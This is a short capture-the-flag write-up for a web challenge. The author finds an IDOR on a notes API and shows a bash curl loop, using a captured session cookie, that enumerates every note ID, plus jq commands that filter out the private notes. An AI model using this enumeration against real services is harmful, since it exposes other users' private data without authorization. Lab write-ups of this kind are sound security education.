The Gate of Broken Names

Personal Rating: Easy

At this challenge we are presented with a web page that we can access as a guest user. It allows us to write and read chronicles and manage our user and "realm". Browsing through the pages and inspecting the URL lets you quickly suspect an IDOR at the page where you can read chronicles. And indeed - setting the id to different values lets you read all notes, including private ones:

I also tried some simple injections at the id parameter (which did not yield anything of interest) before writing a script that retrieves all notes via the IDOR:

for i in {1..300}; do curl --path-as-is -s -k -X $'GET' \
    -H $'Host: 46.101.199.40:30887' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Referer: http://46.101.199.40:30887/note?id=6' -H $'DNT: 1' -H $'Sec-GPC: 1' -H $'Connection: keep-alive' -H $'Priority: u=4' \
    -b $'connect.sid=s%3ABq7vAWAGx5iQAu2xkDE_VHgmMdOJuPNI.oxlpWzywa7ASuMHTZ8RU6%2BrQj952DZ3so%2B3pHhBM2aQ' \
    http://46.101.199.40:30887/api/notes/$i; done >> results.txt

I surrounded the entire text with brackets and added a comma after each entry to convert it to valid json. Then I filtered for all private notes:

cat results.txt | jq >> notesclean.json
cat notesclean.json | jq '.[] | select(.is_private == 1)' > privatenotes.json

I read through the notes and this was found:

PreviousThe Azure Deception NextThe Bone Orchard

Last updated 1 day ago